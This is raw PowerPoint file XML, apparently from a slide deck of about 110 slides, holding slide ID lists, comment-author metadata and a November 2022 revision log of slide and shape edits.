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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="342" r:id="rId5"/>
    <p:sldId id="370" r:id="rId6"/>
    <p:sldId id="351" r:id="rId7"/>
    <p:sldId id="357" r:id="rId8"/>
    <p:sldId id="363" r:id="rId9"/>
    <p:sldId id="361" r:id="rId10"/>
    <p:sldId id="353" r:id="rId11"/>
    <p:sldId id="372" r:id="rId12"/>
    <p:sldId id="371" r:id="rId13"/>
    <p:sldId id="379" r:id="rId14"/>
    <p:sldId id="376" r:id="rId15"/>
    <p:sldId id="378" r:id="rId16"/>
    <p:sldId id="384" r:id="rId17"/>
    <p:sldId id="385" r:id="rId18"/>
    <p:sldId id="388" r:id="rId19"/>
    <p:sldId id="386" r:id="rId20"/>
    <p:sldId id="389" r:id="rId21"/>
    <p:sldId id="394" r:id="rId22"/>
    <p:sldId id="395" r:id="rId23"/>
    <p:sldId id="392" r:id="rId24"/>
    <p:sldId id="391" r:id="rId25"/>
    <p:sldId id="396" r:id="rId26"/>
    <p:sldId id="405" r:id="rId27"/>
    <p:sldId id="397" r:id="rId28"/>
    <p:sldId id="399" r:id="rId29"/>
    <p:sldId id="402" r:id="rId30"/>
    <p:sldId id="400" r:id="rId31"/>
    <p:sldId id="403" r:id="rId32"/>
    <p:sldId id="401" r:id="rId33"/>
    <p:sldId id="407" r:id="rId34"/>
    <p:sldId id="398" r:id="rId35"/>
    <p:sldId id="374" r:id="rId36"/>
    <p:sldId id="414" r:id="rId37"/>
    <p:sldId id="418" r:id="rId38"/>
    <p:sldId id="419" r:id="rId39"/>
    <p:sldId id="420" r:id="rId40"/>
    <p:sldId id="421" r:id="rId41"/>
    <p:sldId id="461" r:id="rId42"/>
    <p:sldId id="460" r:id="rId43"/>
    <p:sldId id="459" r:id="rId44"/>
    <p:sldId id="462" r:id="rId45"/>
    <p:sldId id="463" r:id="rId46"/>
    <p:sldId id="465" r:id="rId47"/>
    <p:sldId id="466" r:id="rId48"/>
    <p:sldId id="467" r:id="rId49"/>
    <p:sldId id="373" r:id="rId50"/>
    <p:sldId id="415" r:id="rId51"/>
    <p:sldId id="404" r:id="rId52"/>
    <p:sldId id="416" r:id="rId53"/>
    <p:sldId id="417" r:id="rId54"/>
    <p:sldId id="424" r:id="rId55"/>
    <p:sldId id="423" r:id="rId56"/>
    <p:sldId id="468" r:id="rId57"/>
    <p:sldId id="425" r:id="rId58"/>
    <p:sldId id="456" r:id="rId59"/>
    <p:sldId id="426" r:id="rId60"/>
    <p:sldId id="458" r:id="rId61"/>
    <p:sldId id="427" r:id="rId62"/>
    <p:sldId id="428" r:id="rId63"/>
    <p:sldId id="431" r:id="rId64"/>
    <p:sldId id="429" r:id="rId65"/>
    <p:sldId id="432" r:id="rId66"/>
    <p:sldId id="434" r:id="rId67"/>
    <p:sldId id="435" r:id="rId68"/>
    <p:sldId id="436" r:id="rId69"/>
    <p:sldId id="430" r:id="rId70"/>
    <p:sldId id="438" r:id="rId71"/>
    <p:sldId id="439" r:id="rId72"/>
    <p:sldId id="440" r:id="rId73"/>
    <p:sldId id="441" r:id="rId74"/>
    <p:sldId id="442" r:id="rId75"/>
    <p:sldId id="443" r:id="rId76"/>
    <p:sldId id="444" r:id="rId77"/>
    <p:sldId id="445" r:id="rId78"/>
    <p:sldId id="446" r:id="rId79"/>
    <p:sldId id="448" r:id="rId80"/>
    <p:sldId id="449" r:id="rId81"/>
    <p:sldId id="450" r:id="rId82"/>
    <p:sldId id="451" r:id="rId83"/>
    <p:sldId id="433" r:id="rId84"/>
    <p:sldId id="437" r:id="rId85"/>
    <p:sldId id="452" r:id="rId86"/>
    <p:sldId id="453" r:id="rId87"/>
    <p:sldId id="454" r:id="rId88"/>
    <p:sldId id="455" r:id="rId89"/>
    <p:sldId id="447" r:id="rId90"/>
    <p:sldId id="362" r:id="rId91"/>
    <p:sldId id="364" r:id="rId92"/>
    <p:sldId id="365" r:id="rId93"/>
    <p:sldId id="366" r:id="rId94"/>
    <p:sldId id="367" r:id="rId95"/>
    <p:sldId id="368" r:id="rId96"/>
    <p:sldId id="369" r:id="rId97"/>
    <p:sldId id="375" r:id="rId98"/>
    <p:sldId id="410" r:id="rId99"/>
    <p:sldId id="413" r:id="rId100"/>
    <p:sldId id="412" r:id="rId101"/>
    <p:sldId id="411" r:id="rId102"/>
    <p:sldId id="409" r:id="rId103"/>
    <p:sldId id="408" r:id="rId104"/>
    <p:sldId id="276" r:id="rId105"/>
    <p:sldId id="290" r:id="rId106"/>
    <p:sldId id="277" r:id="rId107"/>
    <p:sldId id="354" r:id="rId108"/>
    <p:sldId id="359" r:id="rId109"/>
    <p:sldId id="350"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ancerf998@gmail.com" initials="l" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="821e1199acffeeda" providerId="Windows Live"/>
      </p:ext>
    </p:extLst>
  </p:cmAuthor>
  <p:cmAuthor id="2" name="Mina magdy " initials="Mm2" lastIdx="1" clrIdx="1">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="Mina magdy "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F5F5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5646"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="112" y="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6/11/relationships/changesInfo" Target="changesInfos/changesInfo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commentAuthors" Target="commen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presProps" Target="presProps.xml"/><Relationship Id="rId118"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 magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T12:17:13.171" v="4676"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-14T15:50:11.781" v="0" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4169442772" sldId="370"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-14T15:50:11.781" v="0" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4169442772" sldId="370"/>
            <ac:spMk id="4" creationId="{CE1B5067-2650-ACC7-0457-2B1B3D8A85A4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T12:16:57.855" v="4672"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="750862235" sldId="373"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod ord">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T12:17:04.475" v="4674"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3002421174" sldId="374"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-28T11:58:02.707" v="4430"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3002421174" sldId="374"/>
            <ac:spMk id="2" creationId="{B2BC2DBF-419C-D56A-250A-06B694778541}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modTransition">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-18T08:32:44.317" v="1135"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1456621365" sldId="376"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-14T15:51:35.618" v="27" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1456621365" sldId="376"/>
            <ac:spMk id="2" creationId="{C631744A-24AA-636E-099A-6E909924CE39}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-14T15:51:14.443" v="25" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1456621365" sldId="376"/>
            <ac:spMk id="3" creationId="{5C498DBA-4035-BB31-9F3D-DD68FE27A8CB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-14T15:56:00.098" v="75" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1456621365" sldId="376"/>
            <ac:spMk id="4" creationId="{4535B31E-69B4-8ABF-9A00-48D38D97BAB5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-14T15:56:07.599" v="78" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1456621365" sldId="376"/>
            <ac:spMk id="5" creationId="{0766357B-D96B-731B-3C2B-3D4860D728FD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T11:09:26.212" v="1126" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1456621365" sldId="376"/>
            <ac:spMk id="6" creationId="{535D601C-963D-E03D-96E0-87E45BA5A3ED}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-14T16:02:31.432" v="185" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4183464569" sldId="377"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod modTransition">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-18T08:32:48.665" v="1136"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3054126119" sldId="378"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-14T16:08:47.429" v="194" actId="2711"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3054126119" sldId="378"/>
            <ac:spMk id="6" creationId="{535D601C-963D-E03D-96E0-87E45BA5A3ED}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modTransition">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-18T08:32:34.475" v="1131"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1857875272" sldId="379"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:51:20.443" v="200" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1857875272" sldId="379"/>
            <ac:spMk id="2" creationId="{04DD8650-9ABF-6FC8-DEC2-B52099EA12CA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:51:23.481" v="202" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1857875272" sldId="379"/>
            <ac:spMk id="3" creationId="{F7DC60C0-9DB0-B360-9D31-1057CAA29F4F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:51:27.278" v="204" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1857875272" sldId="379"/>
            <ac:spMk id="4" creationId="{81A884E4-966F-C7B9-3722-84886108B0C9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:51:32.782" v="206" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1857875272" sldId="379"/>
            <ac:spMk id="5" creationId="{F189C685-EA2C-9F46-249A-51834CDA472F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:51:46.579" v="210"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1857875272" sldId="379"/>
            <ac:spMk id="6" creationId="{CB1BA339-159F-51D4-36C4-15847AEF04F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:51:50.024" v="213"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1857875272" sldId="379"/>
            <ac:spMk id="7" creationId="{FD5ECE4C-E174-EFA7-FF31-A6579A33B741}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T19:06:04.440" v="467" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1857875272" sldId="379"/>
            <ac:spMk id="8" creationId="{A3009B9E-9E2F-3673-CF1E-563DD4A0D041}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:54:07.324" v="249" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1857875272" sldId="379"/>
            <ac:spMk id="9" creationId="{CFEAF0CD-1B1D-9613-CAB1-1784E054121B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:59:00.514" v="390" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3673856916" sldId="380"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:59:01.561" v="391" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1512639546" sldId="381"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:59:02.835" v="392" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2478486151" sldId="382"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:58:58.305" v="389" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4181032889" sldId="383"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modTransition">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-18T08:32:52.476" v="1137"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3489182522" sldId="384"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:58:35.944" v="380" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3489182522" sldId="384"/>
            <ac:spMk id="2" creationId="{9C5B7866-2B56-13A1-2402-79702AB8A24D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-16T19:07:34.809" v="609"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3489182522" sldId="384"/>
            <ac:spMk id="2" creationId="{A4053889-28B8-4392-F6D0-5E2B675CAAF5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T19:08:24.864" v="497" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3489182522" sldId="384"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-16T19:09:18.151" v="613" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3489182522" sldId="384"/>
            <ac:spMk id="4" creationId="{4DF7C0E6-750F-A124-25C2-8EA9BBBB28EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:58:52.285" v="386" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3489182522" sldId="384"/>
            <ac:spMk id="4" creationId="{AEB2F624-3D1A-DA84-81EA-1C5B83E02C87}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:58:55.639" v="388" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3489182522" sldId="384"/>
            <ac:spMk id="5" creationId="{236D6191-0137-BDC8-C0B5-04741E8E64FC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-16T19:19:40.246" v="705" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3489182522" sldId="384"/>
            <ac:spMk id="5" creationId="{EB815031-F639-E13E-2203-717F283BF9F2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:59:18.427" v="395" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3489182522" sldId="384"/>
            <ac:picMk id="6" creationId="{99E58670-6182-EA05-B860-9747F91F769E}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord modTransition">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-18T08:32:56.092" v="1138"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="327092513" sldId="385"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-16T19:19:13.059" v="702" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="327092513" sldId="385"/>
            <ac:spMk id="2" creationId="{CC5DE35D-5084-497A-63B7-3957DE18460A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T10:09:23.936" v="706" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="327092513" sldId="385"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-15T18:59:09.467" v="393" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1449418738" sldId="385"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modTransition">
        <pc:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-18T08:48:46.020" v="1155"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2381316472" sldId="386"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T10:52:13.605" v="934"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="2" creationId="{1E51B96E-9721-E3FB-30B1-28A5054BE362}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T11:03:51.827" v="1073" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="3" creationId="{6841A15B-D575-E44D-CB98-0DDCBE8C9595}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T11:00:43.726" v="1029"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="4" creationId="{72C543BD-82EA-B9EF-9739-E57BE0FF561A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T10:58:47.070" v="1001" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="6" creationId="{A7D42F62-AD1A-4424-D433-BC5B83D2507B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T11:04:06.667" v="1079" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="7" creationId="{A6E6608B-1C47-2121-A0E9-ADC47DBC75CA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T11:01:03.713" v="1031" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="8" creationId="{C8F13EFE-B090-AAE0-48CE-28B9FDDB2818}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T11:02:09.785" v="1045" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="9" creationId="{5BC14E19-E008-4EA0-366C-6F3D2FE7C977}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T11:03:42.820" v="1070"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="10" creationId="{B532B257-F32B-0A74-6A2D-9D170E7A689B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T11:03:42.820" v="1072"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="11" creationId="{802D8E05-E257-240C-147F-1B0EF066B777}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T11:04:58.267" v="1083"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="12" creationId="{FBA83531-0909-78F9-A766-D9310044C436}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T11:04:58.268" v="1085"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2381316472" sldId="386"/>
            <ac:spMk id="13" creationId="{1BEA8341-FF07-4059-1075-589D53E10C74}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Mina magdy 2" userId="fb452f30fe675951" providerId="LiveId" clId="{00FFF241-ED83-4489-A9D5-92E54EC00023}" dt="2022-11-17T11:07:12.241" v="1100" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
